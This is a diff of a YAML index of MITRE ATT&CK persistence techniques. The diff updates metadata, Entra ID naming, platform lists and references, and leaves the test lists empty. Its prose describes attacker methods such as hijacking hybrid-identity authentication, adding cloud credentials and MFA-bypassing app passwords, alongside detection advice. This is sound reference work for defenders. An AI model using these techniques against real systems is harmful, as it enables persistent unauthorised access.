         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -30067,9 +30491,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -30078,21 +30502,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30132,13 +30557,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30215,12 +30637,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30239,6 +30660,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30246,7 +30668,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30266,29 +30687,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30365,12 +30788,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30385,6 +30807,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30393,18 +30816,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30436,9 +30859,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30510,7 +30930,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30537,7 +30956,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30563,13 +30982,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -30690,7 +31107,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -30762,7 +31178,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -30832,7 +31247,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -30942,7 +31356,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -30996,7 +31409,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31029,8 +31442,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -31061,7 +31472,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31096,12 +31507,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31178,7 +31587,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31232,7 +31640,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31264,7 +31671,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31294,55 +31701,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31373,6 +31735,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31382,9 +31745,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31392,11 +31759,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31428,7 +31831,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31476,13 +31879,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31495,16 +31896,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31516,16 +31917,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31580,7 +31981,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -31641,7 +32041,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -31717,7 +32116,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -31745,8 +32144,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -31772,7 +32169,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31797,23 +32194,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -31823,11 +32218,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -31838,12 +32237,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
